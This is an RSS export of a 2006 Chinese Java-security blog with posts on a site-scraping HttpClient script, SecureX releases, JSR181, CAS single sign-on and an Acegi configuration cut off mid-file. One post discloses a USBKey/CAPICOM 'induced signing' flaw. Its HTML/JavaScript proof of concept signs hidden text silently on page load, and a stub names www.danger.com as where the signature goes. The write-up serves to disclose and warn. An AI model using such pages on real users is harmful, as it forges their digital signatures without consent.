David.turing's Security Blog david.turing(兴趣是Webservice安全以及Java安全) CSDN Java安全版主 Matrix安全版主(ID:cas) 广州UserGroup Leader Dev2dev SOA/Webservice版主 CSDN Webservice/XML版主 http://security.javaeye.com UTF-8 Copyright 2003-2008, JavaEye.com http://blogs.law.harvard.edu/tech/rss JavaEye - 做最棒的软件开发交流社区 获取PDABase.com所有下载文件的HTTPClient代码 security 作者: security  链接:http://security.javaeye.com/blog/34990  发表时间: 2006年11月13日

声明:本文系JavaEye网站发布的原创博客文章,未经作者书面许可,严禁任何网站转载本文,否则必将追究法律责任!

最近追Friends(老友记),想在PPC上看,顺便编写了一个HTTPClient的Sample,可以获取PDABase.com的所有下载链接,希望对PDA爱好者有所帮助,可以自己生成Flashget的Task,一次性Download整个网站。

package  org.apache.commons.httpclient;

 import  java.io.IOException;
 import  org.apache.commons.httpclient.methods.GetMethod;

 /**  
    @author  by david.turing
   security.blogjava.net
   www.pgp.org.cn
* */

public   class  PDABase  {

     public   static   void  main(String[] args)  {

        HttpClient client  =   new  HttpClient();
        client.getHostConfiguration().setHost( " www.pdabase.com " 80 " http " );
        GetMethod method  =    new  GetMethod();
        String x  =   null ;
         int  start = 0 ;
         int  end = 25000;
        try {
            
            for (int i =start; i < end; i++{
//                method = new GetMethod("/download/SoftDown.asp?ID=1000" + i);
                
                method.setPath("/download/SoftDown.asp?ID=" +(10000+ i));
                method.setRequestHeader("Cookie",
                        "ASPSESSIONIDQQRRRDRR=IACDBGAAMNMOCCBIFADECAJL");
                client.executeMethod(method);
                if(method.getStatusLine().getStatusCode()==200)
                {                    
                    String response = method.getResponseBodyAsString();

                    if (response != null{
                        if(response.indexOf("ftp")>0&&response.indexOf("zip")>0)
                        {
                            if ((x = response.substring(response.indexOf("ftp"),
                                    response.indexOf("zip"))) != null{
                                System.out.println(StringUtils.iso2gb(x)+"zip");                        
                            }
                        }
                        else if(response.indexOf("ftp")>0&&response.indexOf("rar")>0)
                        {
                            if ((x = response.substring(response.indexOf("ftp"),
                                    response.indexOf("rar"))) != null{
                                System.out.println(StringUtils.iso2gb(x)+"rar");                        
                            }
                        }
                        else if(response.indexOf("ftp")>0&&response.indexOf("exe")>0)
                        {
                            if ((x = response.substring(response.indexOf("ftp"),
                                    response.indexOf("exe"))) != null{
                                System.out.println(StringUtils.iso2gb(x)+"exe");                        
                            }
                        }
                    }
                }
            }
            method.releaseConnection();
        } catch (HttpException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

本文的讨论也很精彩,浏览讨论>>


JavaEye推荐



]]> Mon, 13 Nov 2006 23:18:00 +0800 http://security.javaeye.com/blog/34990 http://security.javaeye.com/blog/34990 [原创]国内大部分的USBKey通过B/S方式(CAPICOM)产生数字签名的严重安全漏洞 security 作者: security  链接:http://security.javaeye.com/blog/34991  发表时间: 2006年11月13日

声明:本文系JavaEye网站发布的原创博客文章,未经作者书面许可,严禁任何网站转载本文,否则必将追究法律责任!

很多人喜欢使用UsbKey产生数字签名的方式提交到服务器,最近我做的几个省厅的项目均如此,利用USBKey提供的ActiveX插件(更常见的是CAPICOM接口)通过USBKey厂商提供的WindowsCSP去调用UsbKey产生数字签名。

1,  用户在页面浏览文书

      2,  用户对页面中的 Form 数据进行签名

      3,  在本地产生数字签名

      4,  数字签名提交到服务器


   大家都认为以上的方案非常可靠,但这种方案存在一个极为严重的安全问题——诱导签名。
   UsbKey的用户在大多数情况下无法确认自己看到的数据就是自己说签名的数据!因为,签名数据源是通过 JavaScript 去控制的,而不是用户。

我举一个简单的例子,如下面的页面 用户看到并以为自己产生签名的源数据是“逮捕张子强及其同伙” , 但其实不是!

<script src="Sign.js"></script>

<OBJECT id="oCAPICOM"

codeBase="capicom.cab#version=2,0,0,3" classid="clsid:A996E48C-D3DC-4244-89F7-AFA33EC60679"></OBJECT>

 

<br>

<form id="writeSig" method="post" name="writeSig" action="/SignServlet" target="_top">

看上去进行签名的数据: <input name="data"  value=" 逮捕张子强及其同伙 " >

 

<br>

<!-- 实际上进行签名的数据: " 释放张子强及其同伙 " -->

<input type="hidden" name="data_danger" value=" 释放张子强及其同伙 " >

<br>

 

数字签名结果: <textarea cols="100" rows="20" id="theSignedData"></textarea>

<br>

<INPUT TYPE="button" name=t1

value=" 签名数据 " onclick="theSignedData.value=pkiSignData(data_danger.value)">

</form>

上面的恶意例子能够运行于所有的 USBKey 的页面,用户签名的数据其实是“释放张子强及其同伙”。但由于数据被隐藏于页面之后,用户根本看不到,以至于产生恶意诱导签名的严重后果。

防止这种恶意诱导签名的办法通常是在服务器要确保所有的涉及数字签名的页面在传递到客户端 IE 浏览器前,都不会被篡改,但这种方法不能保证 100% 安全,因为在用户那一端,仍然存在一种非常高风险的诱导签名的可能,甚至是未经用户许可,直接调用用户 USBKey 去产生恶意数字签名,看下面的例子:

用户在浏览页面的时候,已经在页面背后无声无色地产生了数字签名,而且用户根本无法知道自己已经对“ 我今天去好又多偷了几包烟 ”这样的内容进行了签名!

下面的例子是真实的例子,能够运行于任何的 IE 浏览器,最后的结果是,页面通过用户的 UsbKey 产生了恶意签名并送到 www.danger.com

<script src="Sign.js"></script>

<OBJECT id="oCAPICOM"

codeBase="capicom.cab#version=2,0,0,3" classid="clsid:A996E48C-D3DC-4244-89F7-AFA33EC60679"></OBJECT>

<body onLoad="signWithAllowed()">

<br>

<form  id="writeSig" method="post" name="writeSig" action="/SignServlet" target="_top">

你在浏览文书: <input name="data"  value=" 逮捕张子强及其同伙 ">

你以为这是仅仅是一个用于浏览的页面!!

 

</body>

 

<script>

function signWithAllowed()

{

         //alert(' 恶意签名执行 , 以下的签名将不知不觉地被产生,并保存到某个地方 ');

         var sign_value=pkiSignData(' 我今天去好又多偷了几包烟 s');

         //alert(sign_value);

         sendSignValueToDangerPalce();

}

 

function sendSignValueToDangerPalce()

{

         //Send Signvalue to www.danger.com

}

</script>

       在目前大多数Usbkey中均存在诱导签名的问题,在第一次产生数字签名的时候,USBKey会提示用户输入PIN,但在第2次,第3次签名动作产生的时候,这些都已经是用户无法感知的事实!
      这就是我为什么不希望使用B/S,而是C/S方式手段产生数字签名的原因。
       我的另外一篇文章提到如何通过Java调用CryptoAPI: 
      http://www.blogjava.net/security/archive/2006/07/11/java_cryptoapi_csp_signature.html, 已经被用于SecureX Eclipse Plugin(securex.sourceforge.net)当中。
      
      在我负责的多个业务系统中的数字签名/印章中,均存在上面的危险!除非我们能够确保恶意页面不存在,否则,某个程序员在系统中,哪怕是Insert很小一段JS代码到某个不显眼的页面,后果是非常严重的。
本文的讨论也很精彩,浏览讨论>>


JavaEye推荐



]]> Mon, 13 Nov 2006 11:06:00 +0800 http://security.javaeye.com/blog/34991 http://security.javaeye.com/blog/34991 SecureX Eclipse Plugin Alpha2发布 security 作者: security  链接:http://security.javaeye.com/blog/34992  发表时间: 2006年11月11日

声明:本文系JavaEye网站发布的原创博客文章,未经作者书面许可,严禁任何网站转载本文,否则必将追究法律责任!


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

在Alpha1(http://www.blogjava.net/security/archive/2006/11/08/SecureX-Eclip
sePlugin.html)的基础上
增加了一下Feature:
支持向导创建KeyStore
支持创建KeyPair
修正了Alpha1的Editor没有Titile的Bug
实现缓存KeyStore密码,免去开发阶段不断输入KeyStore密码
的繁琐

UpdateSite: http://securex.sourceforge.net/updatesite


Sourceforge下载地址
http://sourceforge.net/project/securex

下一个版本将提供一个PGP Eclise
Plugin,作为SecureX的一个标准插件。
1,集成PGP文件加密/签名的PGP,为SecureX PGP Eclipse
Plugin提供一个雏形
1)PGP文件加密,PGP文本CopyClipboard加密
2)浏览,导入,导出PGP Key
3)浏览,导入,导出PGP Keyring
4)Upload PGP钥匙到pgp.org.cn

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.0.5 - Enterprise license
Comment: http://www.pgp.org.cn

iQA/AwUBRWB1202j31FcBpdPEQKJewCgtM1prtvdmEC5OEVCiDZw4+TpQvkAoK9T
KES1VLW/1EHNyOGQDmtTOrYB
=8mix
-----END PGP SIGNATURE-----


本文的讨论也很精彩,浏览讨论>>


JavaEye推荐



]]> Sat, 11 Nov 2006 13:56:00 +0800 http://security.javaeye.com/blog/34992 http://security.javaeye.com/blog/34992 发布SecureX Eclipse Plugin 2.0.0 alpha版本 security 作者: security  链接:http://security.javaeye.com/blog/34993  发表时间: 2006年11月08日

声明:本文系JavaEye网站发布的原创博客文章,未经作者书面许可,严禁任何网站转载本文,否则必将追究法律责任!

What's New in  SecureX 2.0

SecureX is a powerful java library for security developerment purpose. SecureX contains three parts:

1, SecureX-Keytool Eclipse Plugin [GNU License]

Provide a set of Classes that can use for Java Key/Cerficate Management

2, SecureX-SecureSign Library [Apache License]

3, SecureX-CryptoAPI [Apache License]


4, SecureX PGP Eclipse Plugin [Bouncy Castle License, Still developing]
 
SecureX Keytool Library Features

1, Support RSA/DSA Digital Signature Agorithms
2, Support MD5/SHA/RIPEMD Digest Agorithms
3, Support DES/IDEA/TripleDES/Blowfish Cryptography Agorithms
4, Support X.509v1, X.509v3 and CRL Standard
5, Support Keystore management for various keystore types including:
JKS JCEKS PKCS #12 BKS UBER
6, Support add/delete/rename entry(trustcert and keyentry) of Keystore
7, Support cacerts configuration for JAVA 1.3/1.4/1.5
8, Support PrivateKey(PKCS#12) Import/Export
9, Support CSR Generation and CA-Reply Import
10, Support Password management for KeyStore and PrivateKey
11, Support TreeView for X.509 Certificate, CRL and CRL entry X.509 V3 extensions
12, Support certificates export in these formats : X.509/PKCS #7/DER/PEM

 
SecureX SecureSign Library Features

1, Support Yallow and JCE Secure Random
2, Support XML Signature Standard
3, Support BMP Watermark (Build in with SecureRandom Bitmap Stream Embbed technology)
4, Support GIF Watermark (Build in RSA-OAEP Embbed technology)
5, Support PNG Watermark (Build in Secure Random and LSB Techonnlogy)

 
SecureX CryptoAPI Library Features
  • Management X.509 certificates and RSA private keys in Windows CertStores
  • Set/Get/List/Remove Trust Cerficate and KeyEntry on Windows CertStores(MY, ROOT, CA, ADDRESS_BOOK etc)
  • Support for Certificate Chain Building.
  • Create/Verify signatures with RSA private keys using the following algorithms:
    • SHA1withRSA
    • MD5withRSA
    • MD2withRSA
  • Encrypt/decrypt data with RSA public/private keys using the following algorithm, mode and padding:
    • RSA/ECB/PKCS1Padding
  • Wrap and unwrap symmetric- and asymmetric keys with RSA key pairs through Microsoft CryptAPI and PKCS#11.
  • Management for MS CSP and PKCS#11 CSP
  • PIN Call Back interface for Private key
  • Set and get Microsoft CryptoAPI friendly names for certificates.
  • Get Microsoft CryptoAPI friendly names for system (certificate) stores.
  • Get detailed information about PKCS#11 hardware token

 

 
SecureX Eclipse Plugin


Install SecureX

Guide of SecureX


本文的讨论也很精彩,浏览讨论>>


JavaEye推荐



]]> Wed, 08 Nov 2006 16:45:00 +0800 http://security.javaeye.com/blog/34993 http://security.javaeye.com/blog/34993 [转载]推荐一下CSDN《程序员》的《开源大本营》 security 作者: security  链接:http://security.javaeye.com/blog/34994  发表时间: 2006年11月06日

声明:本文系JavaEye网站发布的原创博客文章,未经作者书面许可,严禁任何网站转载本文,否则必将追究法律责任!

战战兢兢,如履薄冰。这是形容在制作这本增刊时的心情,因为《程序员》杂志创刊6年来,出增刊还是第一次。主题选择是否正确?价格是否合理?能否得到读者的认可?这些问题都使我们忐忑不安。

像战士一样去战斗。这是形容工作状态。虽然心情种种不安,但宣传刊登出之后,发行部的电话就没有停歇过,基本上每天都能收到读者的来电,询问增刊事宜。是压力也是挑战,因为我们知道在开发的一线阵营里,有人在关注着这本杂志的进展。确实,像战士一样,联系业界的技术专家,沟通稿件模式,整整的两个月的时间里,除了《程序员》杂志的正常出版外,我们倾尽全力扑在这个项目上。每个人心中着一个倒计时表。我们幸运,开源这一选题得到专家的热烈响应,他们欣然接受邀请,参与到增刊的撰稿中来。中国开源软件推进联盟主席陆首群先生闻听此讯,也特别撰稿分享中国开源软件的现状与未来。他们都是战士!

我们的心愿。当最后一篇稿件完成时,我们能感受到稿件背后的能量。软件开发领域日新月异,特别是在开源方面,中国开源已经启航,我们期望2006年的这本有关开源的有让更多的读者了解开源软件,进而投入到开源世界的怀抱中来!

本增刊共分二十个篇章,根据软件开发生命周期的各技术点划分,包括开源协议、操作系统、数据库、应用服务器、开发平台、编译器、动态语言、开发框架、建模工具、项目管理、版本控制、软件测试、缺陷管理、代码优化、Cache、安全、SOA&Web Services、微软开源技术及开源世界里的故事等,一网打尽开源领域里所有重点而实用的软件。

篇章架构主要包括(针对此领域重点软件)软件基本介绍、软件架构与应用、最新版本与特性、Step by Step、背后的故事、FAQ、推荐书目及推荐网络资源等,力争在最短的篇幅内包罗最详尽的信息。

这不是一本针对某一软件的参考指南,这是一本针对整个开源软件领域的参考指南!

最后再做一个广告:二十个领域,数十位专家,你值得信赖的《开源大本营》!
随刊附赠1CD
在线订阅:http://www.dearbook.com.cn/opensource2/index.aspx
在线讨论:http://community.csdn.net/Expert/topic/5035/5035613.xml
目 录
开源协议篇
序言... 2
开源软件定义... 3
自由软件与开源软件的区别... 3
软件许可证分类... 4
开源组织... 7
相关人物... 8
推荐书目... 10
相关资源网站... 11

操作系统篇... 12
序言... 13
Solaris 14
Red Hat 19
SUSE. 21
FreeBSD.. 23
Debian. 25
商业同类产品... 26
推荐书目... 28
相关资源网站... 29

数据库篇... 31
序言... 32
PostgreSQL. 33
MySQL. 36
FireBird. 36
商业同类产品... 38
推荐书目... 38
相关资源网站... 39

应用服务器篇... 40
序言... 41
Tomcat 42
JBoss 45
Apache Geronimo. 47
GlassFish. 48
商业同类产品... 48
推荐书目... 49
相关资源网站... 50

开发平台篇... 51
序言... 52
Eclipse. 53
NetBeans 58
其它开源平台... 59
商业同类产品... 60
平台发展趋势... 62
推荐书目... 62
相关资源网站... 63

编译器篇... 64
序言... 65
ANTLR... 66
动态语言篇... 76
序言... 77
Ruby on Rails 78
Python. 83
Groovy. 86
推荐书目... 88
相关资源网站... 89

开发框架篇... 90
序言... 91
WebWork. 92
Spring Framework. 101
相关资源网站... 106
Hibernate. 107
推荐书目... 116
相关资源网站... 117

建模工具篇... 118
序言... 119
StarUML. 120
ArgoUML. 121
Umbrello. 122
推荐书目... 123

项目管理篇... 125
序言... 126
Teamwork. 127
GanttProject 132
XPlanner 134
Tudu Lists 136
商业同类产品... 137
推荐书目... 139
相关资源网站... 140

版本管理篇... 142
序言... 143
CVS. 144
Subversion. 148
Git 151
商业同类产品... 155
推荐书目... 155

软件测试篇... 156
序言... 157
JUnit 158
jMock. 166
Selenium.. 167
Apache JMeter 168
商业同类产品... 169
推荐书目... 171
相关资源网站... 172

缺陷管理篇... 174
序言... 175
Scarab. 178
TrackIt 182
ITracker 184
Bugzilla. 185
商业同类产品... 187
推荐书目... 188
相关资源网站... 189

代码检测篇... 191
序言... 192
Checkstyle. 193
FindBugs 199
Jalopy. 201
PMD.. 202
商业同类产品... 204
推荐书目... 205
相关资源网站... 207

Cache篇... 208
序言... 209
Cache指南... 210
ORM里的Cache. 214
Web里的Cache. 216
总结... 219

安全篇... 220
序言... 221
Web Services安全... 222
PGP. 225
SSO (Single Sign-on) 229
推荐书目... 237
相关资源网站... 238

AJAX开发篇... 239
序言... 240
Prototype. 241
Dojo. 244
DWR. 246
其他开源框架... 250
推荐书目... 252
推荐资源网站... 253

性能剖析篇... 254
序言... 255
TPTP. 256
Eclipse Profiler Plugin. 263
P6Spy. 264
SQL Profiler 264
IronTrack SQL. 265
商业同类产品... 265
推荐书目... 267
相关资源网站... 268

.NET开源篇... 269
序言... 270
微软与开源全方面对比... 271
.NET开源代码库与开源框架... 275

开源故事篇... 280
蓝色巨人的开源之路... 281
剑走偏锋:BEA的混合策略... 285
JSF、Ajax双剑合壁... 288
2006北京开源高峰论坛纪实... 292

附录 开源厂商与组织... 297

本文的讨论也很精彩,浏览讨论>>


JavaEye推荐



]]> Mon, 06 Nov 2006 08:54:00 +0800 http://security.javaeye.com/blog/34994 http://security.javaeye.com/blog/34994 用JSR181驱动SpringSide Web Services security 作者: security  链接:http://security.javaeye.com/blog/34995  发表时间: 2006年10月31日

声明:本文系JavaEye网站发布的原创博客文章,未经作者书面许可,严禁任何网站转载本文,否则必将追究法律责任!

和小白一起探讨,觉得如果XFire用JSR181去驱动,一定会非常简洁。
从JSR175发展过来的JSR181,早期实现于Weblogic Workshop 7.1,我们
对@WebService, @WebMethod这些标记的最初理解是将Java类通过Annotation
直接编译成Weblogic的JWS,BEA作为JSR181标准的Leader,很大胆地将
JSR181用于Weblogic 9.1,去驱动Weblogic下一代的WebService框架。

SpringSide团队开始选用XFire作为SS 1.0的时候,已经充分考虑Xfire在JSR181
支持上的优势(对比于Axis)。

作为Spring Web Services的一个最佳实践,我们已经开始考虑基于JSR181驱动的
Web Service框架,我们一致认为JSR181能够为架构解耦提供非常切实有效的
途径。

在下一个SS2.0版本中,我们考虑提供以下的DEMO:
1,基于Security的JSR181 DEMO
2,基于Conversation的JSR181 DEMO
3,基于Transaction的JSR181 DEMO
4,基于Context的JSR181 DEMO

另外,在框架考虑上,会使用JSR标记Handlers的方式(配置文件也是可以,但放在
Annotation,带来的是更好的易读性)

     package  examples.webservices.handlers;

    @WebService ()
    @SOAPMessageHandlers ( {
      @SOAPMessageHandler (
       className = " examples.webservices.soap_handlers.simple.ServerHandler1 " ),
      @SOAPMessageHandler (
       className = " examples.webservices.soap_handlers.simple.ServerHandler2 " )
    } )

     public   class  HandlersImpl {
             // Your Code
    }


另外,在SS2.0的下一个版本中,提供SOAPBinding,可以设置其Style为Document或者RPC,Encode和Literal也是能够定制的(跟Workshop一样方便),也是一件简单的事情:
@WebService
@SOAPBinding(style=SOAPBinding.Style.DOCUMENT,
use=SOAPBinding.Use.LITERAL,
parameterStyle=SOAPBinding.ParameterStyle.BARE)
public class EchoService {
@WebMethod(action="echo")
@WebResult(targetNamespace=“http://www.springside.org.cn”, name="echoResult")
public String echo(
@WebParam(targetNamespace=“http://www.springside.org.cn”, name="echoMsg") String msg){
return msg;
}
}

同时,考虑很多人喜欢搞作SOAP Header,利用它来做一些业务标记处理,我们会支持下面的方式
@WebMethod
public String echo(
@WebParam(name="myHeader",
header=true,
mode=WebParam.Mode.INOUT) StringHolder header,
String msg){
String ret = header.value + "" + msg;
header.value = "got it";
return ret;
}
来自:
[http://www.blogjava.net/security/archive/2006/10/31/Spring_JSR181_XFire_WebService.html]
本文的讨论也很精彩,浏览讨论>>


JavaEye推荐



]]> Tue, 31 Oct 2006 09:47:00 +0800 http://security.javaeye.com/blog/34995 http://security.javaeye.com/blog/34995 PHP与CAS做SSO security 作者: security  链接:http://security.javaeye.com/blog/34996  发表时间: 2006年10月26日

声明:本文系JavaEye网站发布的原创博客文章,未经作者书面许可,严禁任何网站转载本文,否则必将追究法律责任!

昨天在CAS Server 3.0+CAS Client 2.0.11环境中,增加了一台PHP的Web Server,
使用PHPCAS做SSO,按照以往的思路,配置了一下PHPCAS的CAS目录下的
2个php文件,指定了CAS Server的位置,一连就OK了。
[附:
   需要Enable几个PHP的Extension,包括SSL, DOM, ZIP等等
]
PHPCAS的实现比较随便,默认配置下,客户端连CAS Server(HTTPS)都不去做
证书校验。
本文的讨论也很精彩,浏览讨论>>


JavaEye推荐



]]> Thu, 26 Oct 2006 08:04:00 +0800 http://security.javaeye.com/blog/34996 http://security.javaeye.com/blog/34996 PGP论坛开始启用(pgp.sourceforge.net/forum) security 作者: security  链接:http://security.javaeye.com/blog/28458  发表时间: 2006年10月18日

声明:本文系JavaEye网站发布的原创博客文章,未经作者书面许可,严禁任何网站转载本文,否则必将追究法律责任!

http://pgp.sourceforge.net/forum
欢迎探讨PGP技术
本文的讨论也很精彩,浏览讨论>>


JavaEye推荐



]]> Wed, 18 Oct 2006 20:22:00 +0800 http://security.javaeye.com/blog/28458 http://security.javaeye.com/blog/28458 Federate Portal,面向SOA的Portal security 作者: security  链接:http://security.javaeye.com/blog/34998  发表时间: 2006年10月16日

声明:本文系JavaEye网站发布的原创博客文章,未经作者书面许可,严禁任何网站转载本文,否则必将追究法律责任!

这段时间对Federate的应用蛮感兴趣,Weblogic Portal 9.2是第一个实现Federate Portal的产品,它紧紧依赖WSRP协议,让多个Portal之间实现真正的分布式Porlet调用。
1,Federate Portal是真正的分布式结构,Porlet都是远程部署的,然后通过WSRP集成到Federate Portal中
2,完全松耦合的架构设计,远程porlet都是可以独立于Federate Portal进行设计/开发/维护
3,远程Porlet可以协作交互,包括数据交换
4,如果你要使用那些远程的porlet,你无需懂得编写程,那只是click几下的功夫
5,Federate支持最新的SOA标准,包括WSRP, SOAP, WSDL, SAML, UDDI, WS-Security等等

下图是BEA提出的Producer-Consumer模式,体现了Federate Portal的一种应用场景。
我们可以看到,由于porlet的标准化(JSR168),WSRP可以调用多个平台上的Porlet,包括weblogic, websphere, Jobss, sun, oracle.....

federateportal.jpg

用户面向的是Conusmer,而Consumer起了一个集成者的角色,同时向用户综合多种
资源,形成一个统一门户中心的作用,Consumer与其他Producers是通过WSRP协议,
基于SOAP/HTTP的传输协议获取远程porlet的信息,返回给用户。
federateportal_call.jpg

上图一个非常关键的技术是WSRP, WSRP是Web Services for Remote Portlets的简称。很明显,这是一种基于Web Services的集成技术。



FederatePortal和WSRP的相关参考资料

本文的讨论也很精彩,浏览讨论>>


JavaEye推荐



]]> Mon, 16 Oct 2006 22:25:00 +0800 http://security.javaeye.com/blog/34998 http://security.javaeye.com/blog/34998 Yale CAS as an Acegi Client in SpringSide security 作者: security  链接:http://security.javaeye.com/blog/28460  发表时间: 2006年10月15日

声明:本文系JavaEye网站发布的原创博客文章,未经作者书面许可,严禁任何网站转载本文,否则必将追究法律责任!

First,  Set SpringSide's web.xml,  we use Acegi CAS Filter:

     < filter-mapping >
         < filter-name > hibernateFilter </ filter-name >
         < url-pattern > /j_acegi_cas_security_check </ url-pattern >
     </ filter-mapping >

We Should Set Main ACEGI application Context:
1) filterChainProxy should add a cas filter as Acegi's Sample, but here, we reuse
authenticationProcessingFilter, which we act as cas client filter.

     < bean  id ="filterChainProxy"
          class ="org.acegisecurity.util.FilterChainProxy" >
         < property  name ="filterInvocationDefinitionSource" >
             < value >
                CONVERT_URL_TO_LOWERCASE_BEFORE_COMPARISON
                PATTERN_TYPE_APACHE_ANT
                /**=httpSessionContextIntegrationFilter,anonymousProcessingFilter,authenticationProcessingFilter,rememberMeProcessingFilter,logoutFilter,channelProcessingFilter,basicProcessingFilter,securityContextHolderAwareRequestFilter,exceptionTranslationFilter,filterInvocationInterceptor
             </ value >
         </ property >
     </ bean >

2) authenticationProcessingFilter, of course, play the most important role in this
applicationContext_acegi.xml.
In SpringSide,  /admin  is protected resource, so defaultTargetUrl protected it
and all those request to the target url must be authenticated by authenticationManager.
    <bean id="authenticationProcessingFilter" class="org.acegisecurity.ui.cas.CasProcessingFilter">
        <property name="authenticationManager" ref="authenticationManager"/>
        <property name="authenticationFailureUrl">
            <value>/security/login.jsp?login_error=1</value>
        </property>
        <property name="defaultTargetUrl">
            <value>/admin/</value>
        </property>
        <property name="filterProcessesUrl">
            <value>/j_acegi_cas_security_check</value>
        </property>
        <property name="rememberMeServices" ref="rememberMeServices"/>
        <property name="exceptionMappings">
            <value>
                org.acegisecurity.userdetails.UsernameNotFoundException=/security/login.jsp?login_error=user_not_found_error
                org.acegisecurity.BadCredentialsException=/security/login.jsp?login_error=user_psw_error
                org.acegisecurity.concurrent.ConcurrentLoginException=/security/login.jsp?login_error=too_many_user_error
            </value>
        </property>
    </bean>


3) Then, we set all the needed beans in CAS Filter
    <!-- =========  Acegi as a CAS Client的配置============= --> 
    <bean id="exceptionTranslationFilter" class="org.acegisecurity.ui.ExceptionTranslationFilter">
        <property name="authenticationEntryPoint">
            <ref local="casProcessingFilterEntryPoint"/>
        </property>
    </bean>
    
   <!-- cas config -->
    <bean id="casProcessingFilterEntryPoint" class="org.acegisecurity.ui.cas.CasProcessingFilterEntryPoint">
        <property name="loginUrl"><value>https://sourcesite:8443/cas/login</value></property>
        <property name="serviceProperties"><ref local="serviceProperties"/></property>
    </bean>
    
    <bean id="authenticationManager" class="org.acegisecurity.providers.ProviderManager">
        <property name="providers">
            <list>
                <ref local="casAuthenticationProvider"/>
            </list>
        </property>
    </bean>
    
    <bean id="casAuthenticationProvider" class="org.acegisecurity.providers.cas.CasAuthenticationProvider">
        <property name="casAuthoritiesPopulator"><ref bean="casAuthoritiesPopulator"/></property>
        <property name="casProxyDecider"><ref local="casProxyDecider"/></property>
        <property name="ticketValidator"><ref local="casProxyTicketValidator"/></property>
        <property name="statelessTicketCache"><ref local="statelessTicketCache"/></property>
        <property name="key"><value>my_password_for_this_auth_provider_only</value></property>
    </bean>
    <bean id="casProxyTicketValidator" class="org.acegisecurity.providers.cas.ticketvalidator.CasProxyTicketValidator">
        <property name="casValidate"><value>https://sourcesite:8443/cas/proxyValidate</value></property>
        <property name="serviceProperties"><ref local="serviceProperties"/></property>
    </bean>
    <!-- 
    <bean id="casProxyDecider" class="org.acegisecurity.providers.cas.proxy.AcceptAnyCasProxy" />
    -->
    <bean id="casProxyDecider" class="org.acegisecurity.providers.cas.proxy.RejectProxyTickets" />
    
    <bean id="serviceProperties" class="org.acegisecurity.ui.cas.ServiceProperties">
        <property name="service">
            <value>http://gzug:8080/springside/j_acegi_cas_security_check</value>
        </property>
        <property name="sendRenew">
            <value>false</value>
        </property>
    </bean>
    
    <bean id="statelessTicketCache" class="org.acegisecurity.providers.cas.cache.EhCacheBasedTicketCache">
        <property name="cache">
            <bean class="org.springframework.cache.ehcache.EhCacheFactoryBean">
                <property name="cacheManager">
                    <bean class="org.springframework.cache.ehcache.EhCacheManagerFactoryBean"/>
                </property>
                <property name="cacheName" value="userCache"/>
            </bean>
        </property>
    </bean>
    
    <bean id="casAuthoritiesPopulator" class="org.acegisecurity.providers.cas.populator.DaoCasAuthoritiesPopulator">
        <property name="userDetailsService"><ref local="jdbcDaoImpl"/></property>
    </bean>

    <bean id="casProcessingFilter" class="org.acegisecurity.ui.cas.CasProcessingFilter">
        <property name="authenticationManager"><ref local="authenticationManager"/></property>
        <property name="authenticationFailureUrl"><value>/casfailed.jsp</value></property>
        <property name="defaultTargetUrl"><value>/</value></property>
        <property name="filterProcessesUrl"><value>/j_acegi_cas_security_check</value></property>
    </bean>

casProcessingFilterEntryPoint is very critical,
loginUrl is the CAS Server's /login url, you should set up your CAS Server(2.0 or 3.0) and config for
those JKS keystore after enable SSL in Tomcat(Tomcat 5.5/conf/server.xml) and place the cacerts that
have the CAS Server's public cert to Acegi Client's JDK/jre/lib/security/
Check serviceProperties to make sure that SpringSide Service url is config as /j_acegi_cas_security_check

because Yale CAS use ticket cache for SSO impl, so we should config for statelessTicketCache
Just use springframework's ehcache for cacheManager.

SpringSide use jdbcDaoImpl which perform database authentication. So I am very happy to use it
as casAuthoritiesPopulator , which will set use detail for the user. And these info are very useful for
application authorization.
    <bean id="jdbcDaoImpl"
          class="org.acegisecurity.userdetails.jdbc.JdbcDaoImpl">
        <property name="dataSource" ref="dataSource"/>
        <property name